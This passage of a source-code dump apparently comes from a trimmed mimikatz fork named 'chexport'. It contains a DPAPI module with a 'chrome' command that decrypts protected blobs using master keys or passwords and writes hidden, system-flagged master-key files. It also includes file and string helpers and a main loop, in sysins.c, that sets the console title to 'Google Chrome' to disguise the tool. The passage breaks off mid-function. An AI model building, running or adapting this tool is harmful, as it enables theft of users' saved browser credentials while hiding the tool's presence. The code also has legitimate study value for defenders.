57 | 0x5c, 0x5b, 0x1d, 0x00, 0x10, 0x00, 0x02, 0x5b, 0x16, 0x03, 0x88, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x14, 0x00, 0x14, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x5b, 0x08, 0x4c, 0x00, 0x8c, 0xff, 0x08, 0x4c,
58 | 0x00, 0xe1, 0xff, 0x4c, 0x00, 0x8f, 0xff, 0x4c, 0x00, 0x8b, 0xff, 0x4c, 0x00, 0x87, 0xff, 0x4c, 0x00, 0xd1, 0xff, 0x4c, 0x00, 0x7f, 0xff, 0x5b, 0x1b, 0x03, 0x04, 0x00, 0x19, 0x00, 0x08, 0x00,
59 | 0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x00, 0xb6, 0xff, 0x5b, 0x08, 0x5c, 0x5b, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x14, 0x00,
60 | 0x01, 0x00, 0x02, 0x5b, 0x16, 0x03, 0x1c, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x18, 0x00, 0x18, 0x00, 0x12, 0x00, 0xe6, 0xff, 0x5b, 0x4c, 0x00, 0x31, 0xff, 0x08, 0x08, 0x08, 0x5c, 0x5b, 0x1b, 0x03,
61 | 0x04, 0x00, 0x19, 0x00, 0x10, 0x00, 0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x00, 0xcc, 0xff, 0x5b, 0x08, 0x5c, 0x5b, 0x16, 0x03,
62 | 0x18, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x00, 0x36, 0xff, 0x46, 0x5c, 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0x82, 0xff, 0x46, 0x5c, 0x14, 0x00, 0x14, 0x00, 0x12, 0x00,
63 | 0xbe, 0xff, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x00,
64 | }};
65 | #endif
--------------------------------------------------------------------------------
/chexport/modules/dpapi/kuhl_m_dpapi.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kuhl_m_dpapi.h"
7 |
8 | const KUHL_M_C kuhl_m_c_dpapi[] = {
9 | {kuhl_m_dpapi_chrome, L"chrome", NULL},
10 | };
11 | const KUHL_M kuhl_m_dpapi = {
12 | L"dpapi", L"DPAPI Module", L"DPAPI",
13 | ARRAYSIZE(kuhl_m_c_dpapi), kuhl_m_c_dpapi, NULL, kuhl_m_dpapi_oe_clean
14 | };
15 |
16 | void kuhl_m_dpapi_create_data(LPCWSTR sid, LPCGUID guid, LPCBYTE key, DWORD cbKey, LPCWSTR password, LPCBYTE hash, DWORD cbHash, BOOL isProtected, DWORD flags, BOOL verbose)
17 | {
18 | KULL_M_DPAPI_MASTERKEY masterkey = {2, {0}, 4000, CALG_HMAC, CALG_3DES, NULL, 0}; // XP friendly
19 | KULL_M_DPAPI_MASTERKEYS masterkeys = {2, 0, 0, {0}, 0, 0, flags, 0, 0, 0, 0, &masterkey, NULL, NULL, NULL};
20 | UNICODE_STRING uGuid;
21 | PBYTE data;
22 | wchar_t guidFilename[37];
23 |
24 | if(guid)
25 | {
26 | kprintf(L"Key GUID: ");
27 | kull_m_string_displayGUID(guid);
28 | kprintf(L"\n");
29 |
30 | if(key && cbKey)
31 | {
32 | if(NT_SUCCESS(RtlStringFromGUID(guid, &uGuid)))
33 | {
34 | CDGenerateRandomBits(masterkey.salt, sizeof(masterkey.salt));
35 | RtlCopyMemory(masterkeys.szGuid, uGuid.Buffer + 1, uGuid.Length - 4);
36 | if(password)
37 | {
38 | if(!kull_m_dpapi_protect_masterkey_with_password(masterkeys.dwFlags, &masterkey, password, sid, isProtected, key, cbKey, NULL))
39 | PRINT_ERROR(L"kull_m_dpapi_protect_masterkey_with_password\n");
40 | }
41 | else if(hash && cbHash)
42 | {
43 | if(!kull_m_dpapi_protect_masterkey_with_userHash(&masterkey, hash, cbHash, sid, isProtected, key, cbKey, NULL))
44 | PRINT_ERROR(L"kull_m_dpapi_protect_masterkey_with_userHash\n");
45 | }
46 | if(masterkey.pbKey)
47 | {
48 | if(data = kull_m_dpapi_masterkeys_tobin(&masterkeys, &masterkeys.dwMasterKeyLen))
49 | {
50 | if(verbose)
51 | kull_m_dpapi_masterkeys_descr(0, &masterkeys);
52 | RtlCopyMemory(guidFilename, masterkeys.szGuid, min(sizeof(guidFilename), sizeof(masterkeys.szGuid)));
53 | guidFilename[ARRAYSIZE(guidFilename) - 1] = L'\0';
54 | kprintf(L"File \'%s\' (hidden & system): ", guidFilename);
55 | if(kull_m_file_writeData(guidFilename, data, (DWORD) masterkeys.dwMasterKeyLen))
56 | {
57 | if(SetFileAttributes(guidFilename, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_ARCHIVE))
58 | kprintf(L"OK\n");
59 | else PRINT_ERROR_AUTO(L"SetFileAttributes");
60 | }
61 | else PRINT_ERROR_AUTO(L"kull_m_file_writeData");
62 | LocalFree(data);
63 | }
64 | LocalFree(masterkey.pbKey);
65 | }
66 | }
67 | }
68 | else PRINT_ERROR(L"No key\n");
69 |
70 | }
71 | }
72 |
73 | BOOL kuhl_m_dpapi_unprotect_raw_or_blob(LPCVOID pDataIn, DWORD dwDataInLen, LPWSTR *ppszDataDescr, int argc, wchar_t * argv[], LPCVOID pOptionalEntropy, DWORD dwOptionalEntropyLen, LPVOID *pDataOut, DWORD *dwDataOutLen, LPCWSTR pText)
74 | {
75 | BOOL status = FALSE;
76 | PCWSTR szEntropy, szMasterkey, szPassword = NULL;
77 | CRYPTPROTECT_PROMPTSTRUCT promptStructure = {sizeof(CRYPTPROTECT_PROMPTSTRUCT), CRYPTPROTECT_PROMPT_ON_PROTECT | CRYPTPROTECT_PROMPT_ON_UNPROTECT | CRYPTPROTECT_PROMPT_STRONG, NULL, MIMIKATZ}, *pPrompt;
78 |
79 | PBYTE masterkey = NULL, entropy = NULL;
80 | DWORD masterkeyLen = 0, entropyLen = 0, flags = 0;
81 | PKULL_M_DPAPI_BLOB blob;
82 | PKUHL_M_DPAPI_OE_MASTERKEY_ENTRY entry = NULL;
83 | BOOL isNormalAPI = kull_m_string_args_byName(argc, argv, L"unprotect", NULL, NULL);
84 |
85 | if(kull_m_string_args_byName(argc, argv, L"masterkey", &szMasterkey, NULL))
86 | kull_m_string_stringToHexBuffer(szMasterkey, &masterkey, &masterkeyLen);
87 | kull_m_string_args_byName(argc, argv, L"password", &szPassword, NULL);
88 | if(kull_m_string_args_byName(argc, argv, L"entropy", &szEntropy, NULL))
89 | kull_m_string_stringToHexBuffer(szEntropy, &entropy, &entropyLen);
90 | pPrompt = kull_m_string_args_byName(argc, argv, L"prompt", NULL, NULL) ? &promptStructure : NULL;
91 |
92 | if(kull_m_string_args_byName(argc, argv, L"machine", NULL, NULL))
93 | flags |= CRYPTPROTECT_LOCAL_MACHINE;
94 |
95 | if(blob = kull_m_dpapi_blob_create(pDataIn))
96 | {
97 | entry = kuhl_m_dpapi_oe_masterkey_get(&blob->guidMasterKey);
98 | if(entry || (masterkey && masterkeyLen) || isNormalAPI)
99 | {
100 | if(pText)
101 | kprintf(L"%s", pText);
102 |
103 | if(isNormalAPI)
104 | {
105 | kprintf(L"Decrypting using CryptUnprotectData \n");
106 | }
107 |
108 | if(entry)
109 | {
110 | kprintf(L" * volatile cache: ");
111 | kuhl_m_dpapi_oe_masterkey_descr(entry);
112 | }
113 | if(masterkey)
114 | {
115 | kprintf(L" * masterkey : ");
116 | kull_m_string_wprintf_hex(masterkey, masterkeyLen, 0);
117 | kprintf(L"\n");
118 | }
119 | if(pPrompt)
120 | {
121 | kprintf(L" > prompt flags : ");
122 | kull_m_dpapi_displayPromptFlags(pPrompt->dwPromptFlags);
123 | kprintf(L"\n");
124 | }
125 | else flags |= CRYPTPROTECT_UI_FORBIDDEN;
126 | if(entropy)
127 | {
128 | kprintf(L" > entropy : ");
129 | kull_m_string_wprintf_hex(entropy, entropyLen, 0);
130 | kprintf(L"\n");
131 | }
132 | if(szPassword)
133 | kprintf(L" > password : %s\n", szPassword);
134 |
135 | if(entry)
136 | status = kull_m_dpapi_unprotect_raw_or_blob(pDataIn, dwDataInLen, ppszDataDescr, (pOptionalEntropy && dwOptionalEntropyLen) ? pOptionalEntropy : entropy, (pOptionalEntropy && dwOptionalEntropyLen) ? dwOptionalEntropyLen : entropyLen, NULL, 0, pDataOut, dwDataOutLen, entry->data.keyHash, sizeof(entry->data.keyHash), szPassword);
137 |
138 | if(!status && ((masterkey && masterkeyLen) || isNormalAPI))
139 | {
140 | status = kull_m_dpapi_unprotect_raw_or_blob(pDataIn, dwDataInLen, ppszDataDescr, (pOptionalEntropy && dwOptionalEntropyLen) ? pOptionalEntropy : entropy, (pOptionalEntropy && dwOptionalEntropyLen) ? dwOptionalEntropyLen : entropyLen, pPrompt, flags, pDataOut, dwDataOutLen, masterkey, masterkeyLen, szPassword);
141 | if(status && masterkey && masterkeyLen)
142 | kuhl_m_dpapi_oe_masterkey_add(&blob->guidMasterKey, masterkey, masterkeyLen);
143 |
144 | if(!status && !masterkey)
145 | {
146 | if(GetLastError() == NTE_BAD_KEY_STATE)
147 | {
148 | PRINT_ERROR(L"NTE_BAD_KEY_STATE, needed Masterkey is: ");
149 | kull_m_string_displayGUID(&blob->guidMasterKey);
150 | kprintf(L"\n");
151 | }
152 | else PRINT_ERROR_AUTO(L"CryptUnprotectData");
153 | }
154 | }
155 | //kprintf(L"\n");
156 | }
157 | kull_m_dpapi_blob_delete(blob);
158 | }
159 |
160 | if(entropy)
161 | LocalFree(entropy);
162 | if(masterkey)
163 | LocalFree(masterkey);
164 | return status;
165 | }
--------------------------------------------------------------------------------
/modules/kull_m_string.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 |
9 | typedef struct _KIWI_DATETIME_FORMATS {
10 | LPCWSTR format;
11 | int minFields;
12 | BYTE idxYear;
13 | BYTE idxMonth;
14 | BYTE idxDay;
15 | BYTE idxHour;
16 | BYTE idxMinute;
17 | BYTE idxSecond;
18 | } KIWI_DATETIME_FORMATS, *PKIWI_DATETIME_FORMATS;
19 |
20 | typedef CONST char *PCSZ;
21 | typedef STRING ANSI_STRING;
22 | typedef PSTRING PANSI_STRING;
23 | typedef PSTRING PCANSI_STRING;
24 |
25 | typedef STRING OEM_STRING;
26 | typedef PSTRING POEM_STRING;
27 | typedef CONST STRING* PCOEM_STRING;
28 | typedef CONST UNICODE_STRING *PCUNICODE_STRING;
29 |
30 | #define DECLARE_UNICODE_STRING(_var, _string) \
31 | const WCHAR _var ## _buffer[] = _string; \
32 | UNICODE_STRING _var = { sizeof(_string) - sizeof(WCHAR), sizeof(_string), (PWCH) _var ## _buffer }
33 |
34 | #define DECLARE_CONST_UNICODE_STRING(_var, _string) \
35 | const WCHAR _var ## _buffer[] = _string; \
36 | const UNICODE_STRING _var = { sizeof(_string) - sizeof(WCHAR), sizeof(_string), (PWCH) _var ## _buffer }
37 |
38 | extern VOID WINAPI RtlInitString(OUT PSTRING DestinationString, IN PCSZ SourceString);
39 | extern VOID WINAPI RtlInitUnicodeString(OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString);
40 |
41 | extern NTSTATUS WINAPI RtlAnsiStringToUnicodeString(OUT PUNICODE_STRING DestinationString, IN PCANSI_STRING SourceString, IN BOOLEAN AllocateDestinationString);
42 | extern NTSTATUS WINAPI RtlUnicodeStringToAnsiString(OUT PANSI_STRING DestinationString, IN PCUNICODE_STRING SourceString, IN BOOLEAN AllocateDestinationString);
43 |
44 | extern VOID WINAPI RtlUpperString(OUT PSTRING DestinationString, IN const STRING *SourceString);
45 | extern NTSTATUS WINAPI RtlUpcaseUnicodeString(IN OUT PUNICODE_STRING DestinationString, IN PCUNICODE_STRING SourceString, IN BOOLEAN AllocateDestinationString);
46 | extern NTSTATUS WINAPI RtlDowncaseUnicodeString(PUNICODE_STRING DestinationString, IN PCUNICODE_STRING SourceString, IN BOOLEAN AllocateDestinationString);
47 | extern WCHAR WINAPI RtlUpcaseUnicodeChar(IN WCHAR SourceCharacter);
48 | extern NTSTATUS WINAPI RtlUpcaseUnicodeStringToOemString(IN OUT POEM_STRING DestinationString, IN PCUNICODE_STRING SourceString, IN BOOLEAN AllocateDestinationString);
49 |
50 | extern BOOLEAN WINAPI RtlEqualString(IN const STRING *String1, IN const STRING *String2, IN BOOLEAN CaseInSensitive);
51 | extern BOOLEAN WINAPI RtlEqualUnicodeString(IN PCUNICODE_STRING String1, IN PCUNICODE_STRING String2, IN BOOLEAN CaseInSensitive);
52 |
53 | extern LONG WINAPI RtlCompareUnicodeString(IN PCUNICODE_STRING String1, IN PCUNICODE_STRING String2, IN BOOLEAN CaseInSensitive);
54 | extern LONG WINAPI RtlCompareString(IN const STRING *String1, IN const STRING *String2, IN BOOLEAN CaseInSensitive);
55 |
56 | extern VOID WINAPI RtlFreeAnsiString(IN OUT PANSI_STRING AnsiString);
57 | extern VOID WINAPI RtlFreeUnicodeString(IN OUT PUNICODE_STRING UnicodeString);
58 | extern VOID WINAPI RtlFreeOemString(IN OUT POEM_STRING OemString);
59 |
60 | extern NTSTATUS WINAPI RtlStringFromGUID(IN LPCGUID Guid, PUNICODE_STRING UnicodeString);
61 | extern NTSTATUS WINAPI RtlGUIDFromString(IN PCUNICODE_STRING GuidString, OUT GUID *Guid);
62 | extern NTSTATUS NTAPI RtlValidateUnicodeString(IN ULONG Flags, IN PCUNICODE_STRING UnicodeString);
63 |
64 | extern NTSTATUS WINAPI RtlAppendUnicodeStringToString(IN OUT PUNICODE_STRING Destination, IN PCUNICODE_STRING Source);
65 |
66 | extern VOID NTAPI RtlRunDecodeUnicodeString(IN BYTE Hash, IN OUT PUNICODE_STRING String);
67 | extern VOID NTAPI RtlRunEncodeUnicodeString(IN OUT PBYTE Hash, IN OUT PUNICODE_STRING String);
68 |
69 | //BOOL kull_m_string_suspectUnicodeStringStructure(IN PUNICODE_STRING pUnicodeString);
70 | void kull_m_string_MakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, BOOL relative);
71 | BOOL kull_m_string_copyUnicodeStringBuffer(PUNICODE_STRING pSource, PUNICODE_STRING pDestination);
72 | void kull_m_string_freeUnicodeStringBuffer(PUNICODE_STRING pString);
73 | BOOL kull_m_string_suspectUnicodeString(IN PUNICODE_STRING pUnicodeString);
74 | void kull_m_string_printSuspectUnicodeString(PVOID data, DWORD size);
75 |
76 | wchar_t * kull_m_string_qad_ansi_to_unicode(const char * ansi);
77 | wchar_t * kull_m_string_qad_ansi_c_to_unicode(const char * ansi, SIZE_T szStr);
78 | char * kull_m_string_unicode_to_ansi(const wchar_t * unicode);
79 | BOOL kull_m_string_stringToHex(IN LPCWCHAR string, IN LPBYTE hex, IN DWORD size);
80 | BOOL kull_m_string_stringToHexBuffer(IN LPCWCHAR string, IN LPBYTE *hex, IN DWORD *size);
81 |
82 | void kull_m_string_wprintf_hex(LPCVOID lpData, DWORD cbData, DWORD flags);
83 | __time32_t kull_m_string_get_time32(__time32_t * _Time);
84 | void kull_m_string_displayFileTime(IN PFILETIME pFileTime);
85 | void kull_m_string_displayLocalFileTime(IN PFILETIME pFileTime);
86 | BOOL kull_m_string_FileTimeToString(IN PFILETIME pFileTime, OUT WCHAR string[14 + 1]);
87 | void kull_m_string_displayGUID(IN LPCGUID pGuid);
88 | void kull_m_string_displaySID(IN PSID pSid);
89 | PWSTR kull_m_string_getRandomGUID();
90 | void kull_m_string_ptr_replace(PVOID ptr, DWORD64 size);
91 |
92 | BOOL kull_m_string_args_byName(const int argc, const wchar_t * argv[], const wchar_t * name, const wchar_t ** theArgs, const wchar_t * defaultValue);
93 | BOOL kull_m_string_args_bool_byName(int argc, wchar_t * argv[], LPCWSTR name, PBOOL value);
94 | BOOL kull_m_string_copy_len(LPWSTR *dst, LPCWSTR src, size_t size);
95 | BOOL kull_m_string_copy(LPWSTR *dst, LPCWSTR src);
96 | BOOL kull_m_string_copyA_len(LPSTR *dst, LPCSTR src, size_t size);
97 | BOOL kull_m_string_copyA(LPSTR *dst, LPCSTR src);
98 | PWSTR kull_m_string_unicode_to_string(PCUNICODE_STRING src);
99 | BOOL kull_m_string_quickxml_simplefind(LPCWSTR xml, LPCWSTR node, LPWSTR *dst);
100 | #if !defined(MIMIKATZ_W2000_SUPPORT)
101 | BOOL kull_m_string_quick_base64_to_Binary(PCWSTR base64, PBYTE *data, DWORD *szData);
102 | BOOL kull_m_string_quick_base64_to_BinaryA(PCSTR base64, PBYTE *data, DWORD *szData);
103 | BOOL kull_m_string_quick_urlsafe_base64_to_Binary(PCWSTR badBase64, PBYTE *data, DWORD *szData);
104 | BOOL kull_m_string_quick_urlsafe_base64_to_BinaryA(PCSTR badBase64, PBYTE *data, DWORD *szData);
105 | BOOL kull_m_string_quick_binary_to_base64A(const BYTE *pbData, const DWORD cbData, LPSTR *base64);
106 | BOOL kull_m_string_quick_binary_to_urlsafe_base64A(const BYTE *pbData, const DWORD cbData, LPSTR *badBase64);
107 | BOOL kull_m_string_EncodeB64_headersA(LPCSTR type, const PBYTE pbData, const DWORD cbData, LPSTR *out);
108 | #endif
109 | BOOL kull_m_string_sprintf(PWSTR *outBuffer, PCWSTR format, ...);
110 | BOOL kull_m_string_sprintfA(PSTR *outBuffer, PCSTR format, ...);
111 | BOOL kull_m_string_stringToFileTime(LPCWSTR string, PFILETIME filetime);
--------------------------------------------------------------------------------
/modules/kull_m_file.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kull_m_file.h"
7 |
8 | BOOL ib64IO = FALSE, ib64II = FALSE;
9 |
10 | BOOL kull_m_file_getCurrentDirectory(wchar_t ** ppDirName)
11 | {
12 | BOOL reussite = FALSE;
13 | DWORD tailleRequise = GetCurrentDirectory(0, NULL);
14 | if(*ppDirName = (wchar_t *) LocalAlloc(LPTR, tailleRequise * sizeof(wchar_t)))
15 | if(!(reussite = (tailleRequise > 0 && (GetCurrentDirectory(tailleRequise, *ppDirName) == tailleRequise - 1))))
16 | LocalFree(*ppDirName);
17 |
18 | return reussite;
19 | }
20 |
21 | BOOL kull_m_file_getAbsolutePathOf(PCWCHAR thisData, wchar_t ** reponse)
22 | {
23 | BOOL reussite = FALSE;
24 | wchar_t *monRep;
25 | *reponse = (wchar_t *) LocalAlloc(LPTR, MAX_PATH * sizeof(wchar_t));
26 |
27 | if(PathIsRelative(thisData))
28 | {
29 | if(kull_m_file_getCurrentDirectory(&monRep))
30 | {
31 | reussite = (PathCombine(*reponse , monRep, thisData) != NULL);
32 | LocalFree(monRep);
33 | }
34 | }
35 | else reussite = PathCanonicalize(*reponse, thisData);
36 |
37 | if(!reussite)
38 | LocalFree(*reponse);
39 |
40 | return reussite;
41 | }
42 |
43 | BOOL kull_m_file_isFileExist(PCWCHAR fileName)
44 | {
45 | BOOL reussite = FALSE;
46 | HANDLE hFile = NULL;
47 |
48 | reussite = ((hFile = CreateFile(fileName, 0, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL)) && hFile != INVALID_HANDLE_VALUE);
49 | if(reussite)
50 | CloseHandle(hFile);
51 | return reussite;
52 | }
53 |
54 | BOOL kull_m_file_writeData(PCWCHAR fileName, LPCVOID data, DWORD lenght)
55 | {
56 | BOOL reussite = FALSE;
57 | DWORD dwBytesWritten = 0, i;
58 | HANDLE hFile = NULL;
59 | LPWSTR base64;
60 |
61 | if(ib64IO)
62 | {
63 | if(CryptBinaryToString((const BYTE *) data, lenght, CRYPT_STRING_BASE64, NULL, &dwBytesWritten))
64 | {
65 | if(base64 = (LPWSTR) LocalAlloc(LPTR, dwBytesWritten * sizeof(wchar_t)))
66 | {
67 | if(reussite = CryptBinaryToString((const BYTE *) data, lenght, CRYPT_STRING_BASE64, base64, &dwBytesWritten))
68 | {
69 | kprintf(L"\n====================\nBase64 of file : %s\n====================\n", fileName);
70 | for(i = 0; i < dwBytesWritten; i++)
71 | kprintf(L"%c", base64[i]);
72 | kprintf(L"====================\n");
73 | }
74 | LocalFree(base64);
75 | }
76 | }
77 | }
78 | else if((hFile = CreateFile(fileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL)) && hFile != INVALID_HANDLE_VALUE)
79 | {
80 | if(WriteFile(hFile, data, lenght, &dwBytesWritten, NULL) && (lenght == dwBytesWritten))
81 | reussite = FlushFileBuffers(hFile);
82 | CloseHandle(hFile);
83 | }
84 | return reussite;
85 | }
86 |
87 | BOOL kull_m_file_readData(PCWCHAR fileName, PBYTE * data, PDWORD lenght) // for ""little"" files !
88 | {
89 | return kull_m_file_readGeneric(fileName, data, lenght, 0);
90 | }
91 |
92 | BOOL kull_m_file_readGeneric(PCWCHAR fileName, PBYTE * data, PDWORD lenght, DWORD flags)
93 | {
94 | BOOL reussite = FALSE;
95 | DWORD dwBytesReaded;
96 | LARGE_INTEGER filesize;
97 | HANDLE hFile = NULL;
98 |
99 | if(ib64II)
100 | {
101 | if(!(reussite = kull_m_string_quick_base64_to_Binary(fileName, data, lenght)))
102 | PRINT_ERROR_AUTO(L"kull_m_string_quick_base64_to_Binary");
103 | }
104 | else if((hFile = CreateFile(fileName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, flags, NULL)) && hFile != INVALID_HANDLE_VALUE)
105 | {
106 | if(GetFileSizeEx(hFile, &filesize) && !filesize.HighPart)
107 | {
108 | *lenght = filesize.LowPart;
109 | if(*data = (PBYTE) LocalAlloc(LPTR, *lenght))
110 | {
111 | if(!(reussite = ReadFile(hFile, *data, *lenght, &dwBytesReaded, NULL) && (*lenght == dwBytesReaded)))
112 | LocalFree(*data);
113 | }
114 | }
115 | CloseHandle(hFile);
116 | }
117 | return reussite;
118 | }
119 |
120 | const wchar_t kull_m_file_forbiddenChars[] = {L'\\', L'/', L':', L'*', L'?', L'\"', L'<', L'>', L'|'};
121 | void kull_m_file_cleanFilename(PWCHAR fileName)
122 | {
123 | DWORD i, j;
124 | for(i = 0; fileName[i]; i++)
125 | for(j = 0; j < ARRAYSIZE(kull_m_file_forbiddenChars); j++)
126 | if(fileName[i] == kull_m_file_forbiddenChars[j])
127 | fileName[i] = L'~';
128 | }
129 |
130 | PWCHAR kull_m_file_fullPath(PCWCHAR fileName)
131 | {
132 | PWCHAR buffer = NULL;
133 | DWORD bufferLen;
134 | if(fileName)
135 | if(bufferLen = ExpandEnvironmentStrings(fileName, NULL, 0))
136 | if(buffer = (PWCHAR) LocalAlloc(LPTR, bufferLen * sizeof(wchar_t)))
137 | if(bufferLen != ExpandEnvironmentStrings(fileName, buffer, bufferLen))
138 | buffer = (PWCHAR) LocalFree(buffer);
139 | return buffer;
140 | }
141 |
142 | BOOL kull_m_file_Find(PCWCHAR directory, PCWCHAR filter, BOOL isRecursive /*TODO*/, DWORD level, BOOL isPrintInfos, BOOL isWithDir, PKULL_M_FILE_FIND_CALLBACK callback, PVOID pvArg)
143 | {
144 | BOOL status = FALSE;
145 | DWORD dwAttrib;
146 | HANDLE hFind;
147 | WIN32_FIND_DATA fData;
148 | PWCHAR fullpath;
149 |
150 | dwAttrib = GetFileAttributes(directory);
151 | if((dwAttrib != INVALID_FILE_ATTRIBUTES) && (dwAttrib & FILE_ATTRIBUTE_DIRECTORY))
152 | {
153 | if(isPrintInfos && !level)
154 | {
155 | kprintf(L"%*s" L"Directory \'%s\'", level << 1, L"", directory);
156 | if(filter)
157 | kprintf(L" (%s)", filter);
158 | kprintf(L"\n");
159 | }
160 | if(fullpath = (wchar_t *) LocalAlloc(LPTR, MAX_PATH * sizeof(wchar_t)))
161 | {
162 | if(wcscpy_s(fullpath, MAX_PATH, directory) == 0)
163 | {
164 | if(wcscat_s(fullpath, MAX_PATH, L"\\") == 0)
165 | {
166 | if(wcscat_s(fullpath, MAX_PATH, filter ? filter : L"*") == 0)
167 | {
168 | hFind = FindFirstFile(fullpath, &fData);
169 | if(hFind != INVALID_HANDLE_VALUE)
170 | {
171 | do
172 | {
173 | if(_wcsicmp(fData.cFileName, L".") && _wcsicmp(fData.cFileName, L".."))
174 | {
175 | if(wcscpy_s(fullpath, MAX_PATH, directory) == 0)
176 | {
177 | if(wcscat_s(fullpath, MAX_PATH, L"\\") == 0)
178 | {
179 | dwAttrib = (DWORD) wcslen(fullpath);
180 | if(wcscat_s(fullpath, MAX_PATH, fData.cFileName) == 0)
181 | {
182 | if(isPrintInfos)
183 | kprintf(L"%*s" L"%3u %c|'%s\'\n", level << 1, L"", level, (fData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) ? L'D' : L'F' , fData.cFileName);
184 | if(isWithDir || !(fData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
185 | {
186 | if(callback)
187 | status = callback(level, fullpath, fullpath + dwAttrib, pvArg);
188 | }
189 | else if(isRecursive && fData.cFileName)
190 | status = kull_m_file_Find(fullpath, filter, TRUE, level + 1, isPrintInfos, isWithDir, callback, pvArg);
191 | }
192 | }
193 | }
194 | }
195 | } while(!status && FindNextFile(hFind, &fData));
196 | FindClose(hFind);
197 | }
198 | }
199 | }
200 | }
201 | LocalFree(fullpath);
202 | }
203 | }
204 | return status;
205 | }
--------------------------------------------------------------------------------
/chexport/sysins.c:
--------------------------------------------------------------------------------
1 | #include "sysins.h"
2 |
3 | const KUHL_M * sysins_modules[] = {
4 | &kuhl_m_standard,
5 | &kuhl_m_dpapi,
6 | };
7 |
8 | int wmain(int argc, wchar_t * argv[])
9 | {
10 | NTSTATUS status = STATUS_SUCCESS;
11 | int i;
12 | #if !defined(_POWERKATZ)
13 | size_t len;
14 | wchar_t input[0xffff];
15 | #endif
16 | sysins_begin();
17 | for(i = MIMIKATZ_AUTO_COMMAND_START ; (i < argc) && (status != STATUS_PROCESS_IS_TERMINATING) && (status != STATUS_THREAD_IS_TERMINATING) ; i++)
18 | {
19 | kprintf(L")> %s\n", argv[i]);
20 | status = sysins_dispatchCommand(argv[i]);
21 | }
22 | #if !defined(_POWERKATZ)
23 | while ((status != STATUS_PROCESS_IS_TERMINATING) && (status != STATUS_THREAD_IS_TERMINATING))
24 | {
25 | kprintf(L"> "); fflush(stdin);
26 | if(fgetws(input, ARRAYSIZE(input), stdin) && (len = wcslen(input)) && (input[0] != L'\n'))
27 | {
28 | if(input[len - 1] == L'\n')
29 | input[len - 1] = L'\0';
30 | kprintf_inputline(L"%s\n", input);
31 | status = sysins_dispatchCommand(input);
32 | }
33 | }
34 | #endif
35 | sysins_end(status);
36 | return STATUS_SUCCESS;
37 | }
38 |
39 | void sysins_begin()
40 | {
41 | kull_m_output_init();
42 | #if !defined(_POWERKATZ)
43 | SetConsoleTitle(L"Google Chrome");
44 | SetConsoleCtrlHandler(HandlerRoutine, TRUE);
45 | #endif
46 | sysins_initOrClean(TRUE);
47 | }
48 |
49 | void sysins_end(NTSTATUS status)
50 | {
51 | sysins_initOrClean(FALSE);
52 | #if !defined(_POWERKATZ)
53 | SetConsoleCtrlHandler(HandlerRoutine, FALSE);
54 | #endif
55 | kull_m_output_clean();
56 | #if !defined(_WINDLL)
57 | if(status == STATUS_THREAD_IS_TERMINATING)
58 | ExitThread(STATUS_SUCCESS);
59 | else ExitProcess(STATUS_SUCCESS);
60 | #endif
61 | }
62 |
63 | BOOL WINAPI HandlerRoutine(DWORD dwCtrlType)
64 | {
65 | sysins_initOrClean(FALSE);
66 | return FALSE;
67 | }
68 |
69 | NTSTATUS sysins_initOrClean(BOOL Init)
70 | {
71 | unsigned short indexModule;
72 | PKUHL_M_C_FUNC_INIT function;
73 | long offsetToFunc;
74 | NTSTATUS fStatus;
75 | HRESULT hr;
76 |
77 | if(Init)
78 | {
79 | RtlGetNtVersionNumbers(&MIMIKATZ_NT_MAJOR_VERSION, &MIMIKATZ_NT_MINOR_VERSION, &MIMIKATZ_NT_BUILD_NUMBER);
80 | MIMIKATZ_NT_BUILD_NUMBER &= 0x00007fff;
81 | offsetToFunc = FIELD_OFFSET(KUHL_M, pInit);
82 | hr = CoInitializeEx(NULL, COINIT_MULTITHREADED);
83 | if(FAILED(hr))
84 | #if defined(_POWERKATZ)
85 | if(hr != RPC_E_CHANGED_MODE)
86 | #endif
87 | PRINT_ERROR(L"CoInitializeEx: %08x\n", hr);
88 | }
89 | else
90 | offsetToFunc = FIELD_OFFSET(KUHL_M, pClean);
91 |
92 | for(indexModule = 0; indexModule < ARRAYSIZE(sysins_modules); indexModule++)
93 | {
94 | if(function = *(PKUHL_M_C_FUNC_INIT *) ((ULONG_PTR) (sysins_modules[indexModule]) + offsetToFunc))
95 | {
96 | fStatus = function();
97 | if(!NT_SUCCESS(fStatus))
98 | kprintf(L">>> %s of \'%s\' module failed : %08x\n", (Init ? L"INIT" : L"CLEAN"), sysins_modules[indexModule]->shortName, fStatus);
99 | }
100 | }
101 |
102 | if(!Init)
103 | {
